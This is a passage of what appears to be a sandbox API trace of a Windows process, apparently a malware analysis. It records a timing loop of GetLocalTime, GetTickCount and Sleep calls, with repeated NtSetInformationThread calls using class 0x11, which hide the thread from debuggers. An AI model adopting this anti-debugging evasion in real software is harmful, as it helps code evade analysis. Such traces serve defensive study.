lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0xd, wMilliseconds=0x5e)) [0177.254] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0177.255] GetProcAddress (hModule=0x77a60000, lpProcName="NtSetInformationThread") returned 0x77a7f99c [0177.255] GetCurrentThread () returned 0xfffffffe [0177.255] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0177.255] GetTickCount () returned 0x1d26b7b [0177.255] Sleep (dwMilliseconds=0x3e8) [0177.362] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0xd, wMilliseconds=0xcb)) [0177.362] GetTickCount () returned 0x1d26fd0 [0177.362] Sleep (dwMilliseconds=0x3e8) [0177.471] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0xd, wMilliseconds=0x138)) [0177.471] GetTickCount () returned 0x1d27424 [0177.471] Sleep (dwMilliseconds=0x3e8) [0177.717] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0xd, wMilliseconds=0x232)) [0177.717] GetTickCount () returned 0x1d27904 [0177.717] Sleep (dwMilliseconds=0x3e8) [0177.766] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0xd, wMilliseconds=0x261)) [0177.766] GetTickCount () returned 0x1d27d1a [0177.766] Sleep (dwMilliseconds=0x3e8) [0177.780] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0xd, wMilliseconds=0x270)) [0177.780] GetTickCount () returned 0x1d28111 [0177.780] Sleep (dwMilliseconds=0x3e8) [0177.816] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0xd, wMilliseconds=0x290)) [0177.816] GetTickCount () returned 0x1d28517 [0177.816] Sleep (dwMilliseconds=0x3e8) [0177.834] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0xd, wMilliseconds=0x29f)) [0177.835] GetTickCount () returned 0x1d2890e [0177.835] Sleep (dwMilliseconds=0x3e8) [0177.842] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0xd, wMilliseconds=0x2af)) [0177.842] GetTickCount () returned 0x1d28d04 [0177.842] Sleep (dwMilliseconds=0x3e8) [0178.048] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0xd, wMilliseconds=0x37a)) [0178.048] GetTickCount () returned 0x1d291b6 [0178.048] Sleep (dwMilliseconds=0x3e8) [0178.124] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0xd, wMilliseconds=0x3c8)) [0178.125] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0178.125] GetProcAddress (hModule=0x77a60000, lpProcName="NtSetInformationThread") returned 0x77a7f99c [0178.125] GetCurrentThread () returned 0xfffffffe [0178.125] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0178.125] GetTickCount () returned 0x1d295eb [0178.125] Sleep (dwMilliseconds=0x3e8) [0178.281] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0xe, wMilliseconds=0x7c)) [0178.282] GetTickCount () returned 0x1d29a6e [0178.282] Sleep (dwMilliseconds=0x3e8) [0178.338] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0xe, wMilliseconds=0xaa)) [0178.338] GetTickCount () returned 0x1d29e84 [0178.338] Sleep (dwMilliseconds=0x3e8) [0178.459] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0xe, wMilliseconds=0x127)) [0178.460] GetTickCount () returned 0x1d2a2e8 [0178.460] Sleep (dwMilliseconds=0x3e8) [0178.517] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0xe, wMilliseconds=0x166)) [0178.517] GetTickCount () returned 0x1d2a70d [0178.517] Sleep (dwMilliseconds=0x3e8) [0178.564] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0xe, wMilliseconds=0x194)) [0178.564] GetTickCount () returned 0x1d2ab23 [0178.564] Sleep (dwMilliseconds=0x3e8) [0178.611] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0xe, wMilliseconds=0x1c3)) [0178.611] GetTickCount () returned 0x1d2af39 [0178.611] Sleep (dwMilliseconds=0x3e8) [0178.656] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0xe, wMilliseconds=0x1f2)) [0178.656] GetTickCount () returned 0x1d2b34e [0178.656] Sleep (dwMilliseconds=0x3e8) [0178.713] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0xe, wMilliseconds=0x221)) [0178.713] GetTickCount () returned 0x1d2b764 [0178.713] Sleep (dwMilliseconds=0x3e8) [0178.781] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0xe, wMilliseconds=0x26f)) [0178.781] GetTickCount () returned 0x1d2bb99 [0178.781] Sleep (dwMilliseconds=0x3e8) [0178.798] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0xe, wMilliseconds=0x27e)) [0178.799] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0178.799] GetProcAddress (hModule=0x77a60000, lpProcName="NtSetInformationThread") returned 0x77a7f99c [0178.799] GetCurrentThread () returned 0xfffffffe [0178.799] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0178.800] GetTickCount () returned 0x1d2bf90 [0178.800] Sleep (dwMilliseconds=0x3e8) [0178.812] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0xe, wMilliseconds=0x28e)) [0178.813] GetTickCount () returned 0x1d2c386 [0178.813] Sleep (dwMilliseconds=0x3e8) [0178.874] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0xe, wMilliseconds=0x2cc)) [0178.874] GetTickCount () returned 0x1d2c7ac [0178.874] Sleep (dwMilliseconds=0x3e8) [0178.974] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0xe, wMilliseconds=0x32a)) [0178.974] GetTickCount () returned 0x1d2cbf0 [0178.974] Sleep (dwMilliseconds=0x3e8) [0179.109] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0xe, wMilliseconds=0x3b6)) [0179.109] GetTickCount () returned 0x1d2d064 [0179.109] Sleep (dwMilliseconds=0x3e8) [0179.215] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0xf, wMilliseconds=0x3c)) [0179.215] GetTickCount () returned 0x1d2d4b8 [0179.215] Sleep (dwMilliseconds=0x3e8) [0179.307] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0xf, wMilliseconds=0x99)) [0179.307] GetTickCount () returned 0x1d2d8fd [0179.307] Sleep (dwMilliseconds=0x3e8) [0179.403] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0xf, wMilliseconds=0xf7)) [0179.403] GetTickCount () returned 0x1d2dd41 [0179.403] Sleep (dwMilliseconds=0x3e8) [0179.494] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0xf, wMilliseconds=0x154)) [0179.495] GetTickCount () returned 0x1d2e186 [0179.495] Sleep (dwMilliseconds=0x3e8) [0179.554] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0xf, wMilliseconds=0x183)) [0179.554] GetTickCount () returned 0x1d2e59c [0179.554] Sleep (dwMilliseconds=0x3e8) [0179.592] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0xf, wMilliseconds=0x1b2)) [0179.593] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0179.593] GetProcAddress (hModule=0x77a60000, lpProcName="NtSetInformationThread") returned 0x77a7f99c [0179.593] GetCurrentThread () returned 0xfffffffe [0179.593] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0179.593] GetTickCount () returned 0x1d2e9b2 [0179.593] Sleep (dwMilliseconds=0x3e8) [0179.638] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0xf, wMilliseconds=0x1e1)) [0179.638] GetTickCount () returned 0x1d2edc7 [0179.638] Sleep (dwMilliseconds=0x3e8) [0179.728] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0xf, wMilliseconds=0x23e)) [0179.729] GetTickCount () returned 0x1d2f20c [0179.729] Sleep (dwMilliseconds=0x3e8) [0179.824] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0xf, wMilliseconds=0x29c)) [0179.824] GetTickCount () returned 0x1d2f651 [0179.824] Sleep (dwMilliseconds=0x3e8) [0179.916] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0xf, wMilliseconds=0x2fa)) [0179.916] GetTickCount () returned 0x1d2fa95 [0179.916] Sleep (dwMilliseconds=0x3e8) [0180.009] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0xf, wMilliseconds=0x357)) [0180.010] GetTickCount () returned 0x1d2feda [0180.010] Sleep (dwMilliseconds=0x3e8) [0180.134] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0xf, wMilliseconds=0x3d4)) [0180.134] GetTickCount () returned 0x1d3033e [0180.134] Sleep (dwMilliseconds=0x3e8) [0180.230] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x10, wMilliseconds=0x4a)) [0180.230] GetTickCount () returned 0x1d30782 [0180.230] Sleep (dwMilliseconds=0x3e8) [0180.299] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x10, wMilliseconds=0x88)) [0180.299] GetTickCount () returned 0x1d30ba8 [0180.299] Sleep (dwMilliseconds=0x3e8) [0180.342] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x10, wMilliseconds=0xb7)) [0180.342] GetTickCount () returned 0x1d30fbd [0180.342] Sleep (dwMilliseconds=0x3e8) [0180.389] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x10, wMilliseconds=0xe6)) [0180.389] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0180.390] GetProcAddress (hModule=0x77a60000, lpProcName="NtSetInformationThread") returned 0x77a7f99c [0180.390] GetCurrentThread () returned 0xfffffffe [0180.390] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0180.390] GetTickCount () returned 0x1d313d3 [0180.390] Sleep (dwMilliseconds=0x3e8) [0180.477] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x10, wMilliseconds=0x143)) [0180.477] GetTickCount () returned 0x1d31818 [0180.478] Sleep (dwMilliseconds=0x3e8) [0180.571] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x10, wMilliseconds=0x1a1)) [0180.571] GetTickCount () returned 0x1d31c5c [0180.571] Sleep (dwMilliseconds=0x3e8) [0180.668] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x10, wMilliseconds=0x1fe)) [0180.668] GetTickCount () returned 0x1d320a1 [0180.668] Sleep (dwMilliseconds=0x3e8) [0180.759] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x10, wMilliseconds=0x25c)) [0180.759] GetTickCount () returned 0x1d324e6 [0180.759] Sleep (dwMilliseconds=0x3e8) [0180.852] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x10, wMilliseconds=0x2ba)) [0180.853] GetTickCount () returned 0x1d3292a [0180.853] Sleep (dwMilliseconds=0x3e8) [0180.945] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x10, wMilliseconds=0x317)) [0180.945] GetTickCount () returned 0x1d32d6f [0180.945] Sleep (dwMilliseconds=0x3e8) [0180.999] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x10, wMilliseconds=0x346)) [0180.999] GetTickCount () returned 0x1d33185 [0180.999] Sleep (dwMilliseconds=0x3e8) [0181.044] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x10, wMilliseconds=0x375)) [0181.044] GetTickCount () returned 0x1d3359a [0181.044] Sleep (dwMilliseconds=0x3e8) [0181.148] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x10, wMilliseconds=0x3e2)) [0181.148] GetTickCount () returned 0x1d339ef [0181.148] Sleep (dwMilliseconds=0x3e8) [0181.242] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x11, wMilliseconds=0x58)) [0181.242] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0181.242] GetProcAddress (hModule=0x77a60000, lpProcName="NtSetInformationThread") returned 0x77a7f99c [0181.243] GetCurrentThread () returned 0xfffffffe [0181.243] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0181.243] GetTickCount () returned 0x1d33e33 [0181.243] Sleep (dwMilliseconds=0x3e8) [0181.335] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x11, wMilliseconds=0xb5)) [0181.335] GetTickCount () returned 0x1d34278 [0181.335] Sleep (dwMilliseconds=0x3e8) [0181.429] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x11, wMilliseconds=0x113)) [0181.429] GetTickCount () returned 0x1d346bc [0181.429] Sleep (dwMilliseconds=0x3e8) [0181.525] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x11, wMilliseconds=0x170)) [0181.525] GetTickCount () returned 0x1d34b01 [0181.525] Sleep (dwMilliseconds=0x3e8) [0181.616] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x11, wMilliseconds=0x1ce)) [0181.616] GetTickCount () returned 0x1d34f46 [0181.616] Sleep (dwMilliseconds=0x3e8) [0181.699] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x11, wMilliseconds=0x21c)) [0181.699] GetTickCount () returned 0x1d3537b [0181.699] Sleep (dwMilliseconds=0x3e8) [0181.771] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x11, wMilliseconds=0x26a)) [0181.772] GetTickCount () returned 0x1d357b0 [0181.772] Sleep (dwMilliseconds=0x3e8) [0181.866] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x11, wMilliseconds=0x2c8)) [0181.866] GetTickCount () returned 0x1d35bf4 [0181.866] Sleep (dwMilliseconds=0x3e8) [0181.961] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x11, wMilliseconds=0x325)) [0181.961] GetTickCount () returned 0x1d36039 [0181.961] Sleep (dwMilliseconds=0x3e8) [0182.053] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x11, wMilliseconds=0x383)) [0182.053] GetTickCount () returned 0x1d3647d [0182.053] Sleep (dwMilliseconds=0x3e8) [0182.178] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x12, wMilliseconds=0x18)) [0182.178] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0182.179] GetProcAddress (hModule=0x77a60000, lpProcName="NtSetInformationThread") returned 0x77a7f99c [0182.179] GetCurrentThread () returned 0xfffffffe [0182.179] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0182.179] GetTickCount () returned 0x1d368e1 [0182.179] Sleep (dwMilliseconds=0x3e8) [0182.274] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x12, wMilliseconds=0x75)) [0182.274] GetTickCount () returned 0x1d36d26 [0182.274] Sleep (dwMilliseconds=0x3e8) [0182.360] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x12, wMilliseconds=0xc3)) [0182.360] GetTickCount () returned 0x1d3715b [0182.360] Sleep (dwMilliseconds=0x3e8) [0182.405] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x12, wMilliseconds=0xf2)) [0182.405] GetTickCount () returned 0x1d37571 [0182.405] Sleep (dwMilliseconds=0x3e8) [0182.491] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x12, wMilliseconds=0x150)) [0182.492] GetTickCount () returned 0x1d379b5 [0182.492] Sleep (dwMilliseconds=0x3e8) [0182.583] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x12, wMilliseconds=0x1ad)) [0182.583] GetTickCount () returned 0x1d37dfa [0182.583] Sleep (dwMilliseconds=0x3e8) [0182.677] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x12, wMilliseconds=0x20b)) [0182.677] GetTickCount () returned 0x1d3823e [0182.677] Sleep (dwMilliseconds=0x3e8) [0182.771] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x12, wMilliseconds=0x268)) [0182.771] GetTickCount () returned 0x1d38683 [0182.771] Sleep (dwMilliseconds=0x3e8) [0182.864] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x12, wMilliseconds=0x2c6)) [0182.864] GetTickCount () returned 0x1d38ac8 [0182.865] Sleep (dwMilliseconds=0x3e8) [0182.959] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x12, wMilliseconds=0x324)) [0182.959] GetTickCount () returned 0x1d38f0c [0182.959] Sleep (dwMilliseconds=0x3e8) [0183.056] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x12, wMilliseconds=0x381)) [0183.057] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0183.057] GetProcAddress (hModule=0x77a60000, lpProcName="NtSetInformationThread") returned 0x77a7f99c [0183.057] GetCurrentThread () returned 0xfffffffe [0183.057] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0183.058] GetTickCount () returned 0x1d39351 [0183.058] Sleep (dwMilliseconds=0x3e8) [0183.191] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x13, wMilliseconds=0x16)) [0183.192] GetTickCount () returned 0x1d397b5 [0183.192] Sleep 